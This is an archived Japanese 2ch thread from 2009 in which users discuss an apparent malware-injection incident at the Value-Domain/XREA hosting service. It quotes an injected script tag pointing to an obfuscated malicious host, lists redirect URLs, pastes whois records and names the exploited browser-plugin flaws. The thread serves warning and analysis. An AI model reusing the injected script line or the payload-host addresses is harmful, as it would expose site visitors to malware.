保守管理しているシナ人じゃねぇの、前回と同じ集団

629:名無しさん@お腹いっぱい。
09/07/08 17:22:24 0
js切ってると不便だね。
自分が、jsオフでも別の手段でフォローするようなサイト作りをしてるから、
それが無いサイトを見ると、なんかムカつく。

630:名無しさん@お腹いっぱい。
09/07/08 17:25:55 0
ブラウザで表示されているリンクをクリック、または立ち上げるだけで
それ以上の操作を必要することなく、
ユーザはふと気付くと、シームレスに自動でソフトがインストールされ使用できる状態になっている

そう考えると、無駄な操作がはぶけてストレスのたまらない便利な技術だよね、これ

631:名無しさん@お腹いっぱい。
09/07/08 17:26:52 0
gigazineに垂れ込もうかと思ったら、
jsオフだとメールフォームが表示されない。

632:名無しさん@お腹いっぱい。
09/07/08 17:27:39 0
そこはONにしてもいいだろ

633:名無しさん@お腹いっぱい。
09/07/08 17:28:10 0
ax.xrea.com
URLリンク(wepawet.cs.ucsb.edu)

ax.xrea.com/login.php
URLリンク(wepawet.cs.ucsb.edu)

634:名無しさん@お腹いっぱい。
09/07/08 17:28:33 0
>>605
なるべくならIE以外を使用する

635:名無しさん@お腹いっぱい。
09/07/08 17:29:40 0
>>633
これ踏むとどうなるの?

636:名無しさん@お腹いっぱい。
09/07/08 17:30:16 0
VDの公式告知マダー

637:名無しさん@お腹いっぱい。
09/07/08 17:31:08 0
>>607
狙ってるわけじゃなくてきっと無差別攻撃の結果陥落しただけ

638:名無しさん@お腹いっぱい。
09/07/08 17:34:40 0
このスレだけレンタル鯖板で異常なほど速い……速すぎだろ
異常事態だから当然かもしれんが

639:名無しさん@お腹いっぱい。
09/07/08 17:35:19 0
落書きはすぐに消さないと、ルーズな住民が多い場所だと認知されて、
どんどん落書きが増え、治安も悪くなるって話があるけど、それと同じじゃね?

カウンターや広告の不具合がずっと続いてるし、サポートBBSもろくな対応をしない。
そういう状況だと狙われやすいんじゃないのかな?

640:名無しさん@お腹いっぱい。
09/07/08 17:36:26 P
そーいやカウンターは使ってないけど、あれは大丈夫なのか?

641:名無しさん@お腹いっぱい。
09/07/08 17:36:33 0
>>637
いや、DNS攻撃の頃からターゲットはしてたと思うよ

642:名無しさん@お腹いっぱい。
09/07/08 17:38:02 0
とりあえず、俺らに出来ることは、出来るだけこの件を多くの人に広めることだ。
俺はgoogleアドセンスのスレにこの件を書いてきた。
お前らもVD使ってそうな人がいるスレには何か書き込んだほうがいいかも。

643:名無しさん@お腹いっぱい。
09/07/08 17:38:34 0
maliciousとかどんだけー

644:名無しさん@お腹いっぱい。
09/07/08 17:41:35 0
これでうっかりVDが消滅されても困るんだけどなw

645:名無しさん@お腹いっぱい。
09/07/08 17:42:20 0
>>461がガセネタであればいいのだが。

646:名無しさん@お腹いっぱい。
09/07/08 17:46:26 0
出たり消えたりしてるみたいだからサポートが確認出来てないのかもしれんが
それだと根本的に何の対策もしてないって事だよな

647:名無しさん@お腹いっぱい。
09/07/08 17:49:04 0
問題を認識してるのにしらばっくれてるのと、
問題を認識できていないのと、
どっちが怖い?

648:名無しさん@お腹いっぱい。
09/07/08 17:49:10 0
記事は今のところ検索かけてもこのくらいしか引っかからないな

URLリンク(www.mudaijp.com)
URLリンク(ilion.blog47.fc2.com)
URLリンク(miracosta-s59nov21.cocolog-nifty.com)

649:名無しさん@お腹いっぱい。
09/07/08 17:49:11 0
ここまで騒ぎになってる割に「ドメインを乗っ取られた」系の被害(報告)が無いのが不思議。

650:名無しさん@お腹いっぱい。
09/07/08 17:52:52 0
219.101.229.188/login.php

↑の</HEAD>直前のjs.src ="URLリンク(1856317799:888)";ってのがウイルス?


651:名無しさん@お腹いっぱい。
09/07/08 17:53:41 0
派手にのっとることが目的じゃなくマルウェア配布が目的なので
こっそりとやってるのです

652:名無しさん@お腹いっぱい。
09/07/08 17:54:01 0
せめて危険なURLは全角で書いてくれ
クリックするだけでウイルス感染するかもしれんだろ

653:名無しさん@お腹いっぱい。
09/07/08 17:54:09 0
ごめんリンクになってる削除依頼出すから踏まないでね

654:名無しさん@お腹いっぱい。
09/07/08 17:56:34 0
>>650
おいおい何してんだお前

655:名無しさん@お腹いっぱい。
09/07/08 18:01:41 P
ちょっと出掛けてた間にまたえらい騒ぎになってるな。
で騒ぎが一段落したら、またさっきみたいに改竄は捏造だとか
名無しソースは当てにならんとか言う奴出てくるのかな。

656:名無しさん@お腹いっぱい。
09/07/08 18:02:36 0
おいおい、なんか、どんどん被害大きくなるな。
大丈夫か?この会社は。

657:名無しさん@お腹いっぱい。
09/07/08 18:05:05 0
実被害が出ない限り騒ぎそのものはこのまま収束する可能性が高い
その後で騒ぐ奴は粘着としてスルーされるだろうし

まぁ無関係の俺は公式リリースをwktkして待つぜw

658:名無しさん@お腹いっぱい。
09/07/08 18:06:18 0
ギャーまじですか
今頃気づいたorz

>>649
2週間ほど前によくわからん理由でVDアカウント凍結された><
だれかにアカウント乗っ取られた可能性がある
サポートに連絡した後、担当部署の対応待ちだったんだが
まったく音沙汰なくてしびれを切らしてたところ

659:名無しさん@お腹いっぱい。
09/07/08 18:07:24 0
>>658
「よくわからん理由」plz

660:名無しさん@お腹いっぱい。
09/07/08 18:13:36 0
>>659
自分では購入した覚えのないドメインを指摘され、それが利用規約に違反してるといわれた
管理画面にそもそも入れないから確認しようがないんだけど


661:名無しさん@お腹いっぱい。
09/07/08 18:18:54 0
2週間前ってこのスクリプト組み込まれてたの?

662:名無しさん@お腹いっぱい。
09/07/08 18:22:00 0
その疑問はあるね・・・
違うパターンで乗っ取られた可能性も考えられるから、まだ何ともいえない

663:名無しさん@お腹いっぱい。
09/07/08 18:27:35 0
本人がよくわからんならデジロに対して証明はできんな
この会社は「可能性がある」だけじゃ絶対自分の非とは認めないだろ

664:名無しさん@お腹いっぱい。
09/07/08 18:28:41 P
これか。

>639 :名無しさん@お腹いっぱい。 :2009/06/24(水) 08:25:45 0
>Value-domainとxreaは最低、
>勝手にアカウントを取り消された。
>10個前後のドメインと借りたサーバはパー。
>メールしても返事なし。

10ドメインと鯖は痛いな。

665:名無しさん@お腹いっぱい。
09/07/08 18:38:11 0
もしかしたらかなり前からクラッカーに狙われていて
裏で目立たないようにいろいろ動いていたのかも。
ウィルスも常に表示するよりたまに表示するほうが
気づかれにくくて対策されないし。

666:名無しさん@お腹いっぱい。
09/07/08 18:39:37 0
こえー

アンカーすらまともにつけられない阿呆もいるし

667:名無しさん@お腹いっぱい。
09/07/08 18:45:38 0
10個前後と言ってる時点で怪しいと思うんだけど。へん?

668:名無しさん@お腹いっぱい。
09/07/08 18:46:10 0
>>664
それ別の人。
ドメイン持ってるの2つだが、長年使ってただけに失うのは痛いわ
あああなんとかして移管手続きとれないものか

669:名無しさん@お腹いっぱい。
09/07/08 19:00:41 0
Windows Vista または Windows Server 2008 を使用しているお客様については、
Internet Explorer でこのコントロールにデータを渡す機能が制限されているため、
この脆弱性の影響を受けません。


だってよ
XP\(^o^)/ オワタ

670:名無しさん@お腹いっぱい。
09/07/08 19:15:51 0
スレリンク(sec板)

671:名無しさん@お腹いっぱい。
09/07/08 19:24:14 0
>>669
Win7にするといいおww
でも、今回の乗っ取りはOSは問題じゃないぜ
事件はデジロ内部で起こっている

672:名無しさん@お腹いっぱい。
09/07/08 19:26:03 0
あのすいません
こんな時に何ですがVDネム鯖が6月のはじめからずっと脂肪してる件については…

673:名無しさん@お腹いっぱい。
09/07/08 19:28:03 0
どこに移転するかが問題だなぁ・・・
どこかおすすめありませんか?

ドメイン管理しか使ってないけど。

674:名無しさん@お腹いっぱい。
09/07/08 19:29:17 0
レジストラは鉄板があんまないよなあ

675:名無しさん@お腹いっぱい。
09/07/08 19:29:21 0
そういう話は専スレでやれ

676:名無しさん@お腹いっぱい。
09/07/08 19:33:05 0

value-domain 御中

口コミのパワーをなめんなよ

隠蔽したら口コミで広がるからね

677:名無しさん@お腹いっぱい。
09/07/08 19:34:36 P
>>668
てことは、
ひょっとすると同時期に同じような被害を受けてる人が複数いるって事になるかも。
何が起きているのか考えると、ちょっと恐ろしいね。

678:名無しさん@お腹いっぱい。
09/07/08 19:36:53 P
報告はないけど、カウンターは改竄されてはいない?
カウンターってあまりログインしないからわからんのかな。

679:名無しさん@お腹いっぱい。
09/07/08 19:37:40 0
>>660
> 自分では購入した覚えのないドメインを指摘され
自分で購入した覚えがないなら、なんてドメインか晒せるだろ?
ドメイン名出してみ。

680:名無しさん@お腹いっぱい。
09/07/08 19:39:16 0
>>678
カウンターはウイルス関係なく先々月からのネームサーバ障害でずっと死んでるだろ?

681:名無しさん@お腹いっぱい。
09/07/08 19:39:28 0
>>660
そのドメイン名を具体的に教えてほしい.

身に覚えがないなら, 個人の特定は無理だと思うから.

いったい何に使われているドメインなのか興味がある.

682:名無しさん@お腹いっぱい。
09/07/08 19:40:10 0
>>572
忍者ツールズにも通報する!

>>635
HTMLソースを解析して表示するだけだから安全です。

URLリンク(1856317799:888) このアドレスをnslookupするとhome.ne.jp内のIPじゃね?







今回の一件でVDには個人的にに失望した。
お前ら、どこに移管する?

683:名無しさん@お腹いっぱい。
09/07/08 19:41:40 0
移管は止めんが移管先に関する話題は専スレで

684:名無しさん@お腹いっぱい。
09/07/08 19:42:17 0
>>660
もうちょっと詳しく!!

685:名無しさん@お腹いっぱい。
09/07/08 19:42:52 0
>>682
リンク貼るなよ

686:名無しさん@お腹いっぱい。
09/07/08 19:44:27 0
URLStatusContent Type
 URLリンク(ax.xrea.com)
 URLリンク(1856317799:888)
 about:blank  200  text/html 
 URLリンク(0x6EA52967:888)
 URLリンク(0x6EA52967:888)
 URLリンク(1856317799:888)
 p://ct2.shinobi.jp/sc/1298877  200  text/javascript 
 p://ct2.shinobi.jp/sd/1298877  200  text/javascript 

なにこれ・・・・

687:名無しさん@お腹いっぱい。
09/07/08 19:44:41 0
To: 682
Norton Safe Web
URLリンク(safeweb.norton.com)

Webサイトの場所 香港

688:名無しさん@お腹いっぱい。
09/07/08 19:46:47 0
だから全角でと何度も…

689:名無しさん@お腹いっぱい。
09/07/08 19:48:11 0
inetnum: 110.165.32.0 - 110.165.63.255
netname: FKT-HK
descr: Flat/Rm D Block 1, 8/F
country: HK
role: FEIKE TECH LIMITED - network administrator
address: FLAT/RM D BLK1 8/F 162-170 TAI LIN PAI RD KWAI CHUNG NT HK
country: HK
phone: +852 82050331
e-mail: on@feikecom.com
admin-c: FTLn1-AP
tech-c: FTLn1-AP
nic-hdl: FTLn1-AP
mnt-by: MAINT-FKT-HK
changed: hm-changed@apnic.net 20090408
source: APNIC
changed: hm-changed@apnic.net 20090408

690:名無しさん@お腹いっぱい。
09/07/08 19:49:10 0
>>683 専スレを示せよ

691:名無しさん@お腹いっぱい。
09/07/08 19:49:30 0
「http://~」にしても、専用ブラウザだとリンクするし、
全角にするのが一番無難ですね。

692:名無しさん@お腹いっぱい。
09/07/08 19:51:53 0
>>690
もうそのパターンはしつこいって。
一応レスしとくから勝手に探して勝手にやってね。

693:名無しさん@お腹いっぱい。
09/07/08 19:51:58 0
>>690
>>683じゃないけど
もの凄い勢いで誰かが有料レンタルサーバーを探すスレ 13
スレリンク(hosting板)
あたりじゃね?

694:名無しさん@お腹いっぱい。
09/07/08 19:58:30 0
とりあえずはVDをヲチするしかないの?
誰かお茶持ってきてー

695:名無しさん@お腹いっぱい。
09/07/08 19:59:08 0
さくらはどうでしょう
他社で取得した独自ドメインを利用する
URLリンク(support.sakura.ad.jp)

696:名無しさん@お腹いっぱい。
09/07/08 19:59:31 0
乗り換え先の話題はこっちで

お前らお勧めのレジストラ教えてください
スレリンク(hosting板)

697:名無しさん@お腹いっぱい。
09/07/08 20:01:01 0
>>694
∧_∧
( ´・ω・) みなさん、お茶が入りましたよ・・・・。
( つ旦O
と_)_) 旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦旦

698:名無しさん@お腹いっぱい。
09/07/08 20:02:18 0
Keysysドメインを2個所有している自分には隙が無かった…

699:名無しさん@お腹いっぱい。
09/07/08 20:07:34 0
>>698 何の隙?

700:名無しさん@お腹いっぱい。
09/07/08 20:10:18 0
>>690
まず次のところを見る:
URLリンク(www.domainname.ne.jp)

リンククラブは除外するのが無難:
URLリンク(www24.atwiki.jp)

あとは696の紹介されたスレッドで聞くのが適当だと思う:

お前らお勧めのレジストラ教えてください
スレリンク(hosting板)l50

701:名無しさん@お腹いっぱい。
09/07/08 20:16:04 0
お茶あちーよ!
麦茶にしてくれ!

702:名無しさん@お腹いっぱい。
09/07/08 20:19:49 0
そうそう、msvidctl.dllの脆弱性は確かにActiveXコントロールだからIEだけだけど
同時にFlashPlayerとAdobeReader(Acrobat)の脆弱性も使います。
この2つは最新バージョンにしていなければNetscapeプラグイン系
(Firefox、Opera、Safari、etc.)もやられるのであしからず。

703:名無しさん@お腹いっぱい。
09/07/08 20:27:40 0
>>648
URLリンク(lineage.paix.jp)
URLリンク(www.st.ryukoku.ac.jp)

704:名無しさん@お腹いっぱい。
09/07/08 20:28:48 0
お名前.comが移管380円のキャンペーンやってるから乗っかってみようかな

705:名無しさん@お腹いっぱい。
09/07/08 20:38:57 0
うちはccTLDなので心中するしかなさそうです/ ,' 3  `ヽーっ

706:名無しさん@お腹いっぱい。
09/07/08 20:42:05 0
>>692 お前はほんとに役に立たない奴だなw

707:名無しさん@お腹いっぱい。
09/07/08 20:44:05 0
しかしウイルス置いてあるサイトのアクセス数がすごい勢いで増えてるな

708:名無しさん@お腹いっぱい。
09/07/08 20:48:08 0
サイトジャックが済んでも、ゼロデイ攻撃のためにとりあえずそのまま放置しておくんだろうね。


709:名無しさん@お腹いっぱい。
09/07/08 21:11:42 0
闇市場でアカウント情報を売買してるって言うしな

710:名無しさん@お腹いっぱい。
09/07/08 21:21:39 0
>>704
また随分いいタイミングでのキャンペーンだなぁ。いつのまにか独自DNS使えるようになってるし。

・・・まさか・・・まさかな・・・。

711:名無しさん@お腹いっぱい。
09/07/08 21:22:22 0
>>708
ゼロデイ攻撃の意味わかってるか?

712:名無しさん@お腹いっぱい。
09/07/08 21:23:10 0
>>711
だからゼロデイ攻撃を起こすときに乗っ取ったサイトをいっぺんに書き換えるでしょ

713:名無しさん@お腹いっぱい。
09/07/08 21:33:41 0
頭の悪い会話は他所でやってくれよ
後から来た人がこの騒ぎを冗談と思ったらどうするんだ


最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch